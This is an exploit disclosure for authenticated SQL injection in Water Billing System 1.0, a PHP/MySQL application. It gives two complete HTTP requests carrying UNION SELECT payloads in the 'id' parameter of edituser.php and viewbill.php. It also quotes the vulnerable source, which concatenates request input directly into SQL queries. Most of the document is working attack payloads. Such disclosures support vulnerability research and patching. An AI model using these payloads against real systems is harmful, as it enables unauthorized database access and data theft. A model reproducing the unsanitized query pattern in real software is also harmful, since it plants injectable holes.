# Exploit Title: Water Billing System 1.0 - 'id' SQL Injection (Authenticated)
# Date: 2020-11-14
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html
# Version: 1.0
# Tested on: Apache2 and Windows 10
Vulnerable param: id
-------------------------------------------------------------------------
GET /WBS/edituser.php?id=-9%27+UNION+SELECT+1,@@VERSION,3,4--%20- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/WBS/user.php
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
-------------------------------------------------------------------------
Source Code: edituser.php
..
..
..
$user_id =$_REQUEST['id'];
$result = mysqli_query($conn,"SELECT * FROM user WHERE id = '$user_id'");
..
..
-------------------------------
Vulnerable param: id
-------------------------------------------------------------------------
GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Origin: http://localhost
Connection: close
Cookie: COOKIE
Upgrade-Insecure-Requests: 1
-------------------------------------------------------------------------
Source Code: \WBS\viewbill.php
..
..
..
$id =$_REQUEST['id'];
$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");
..
..
-------------------------------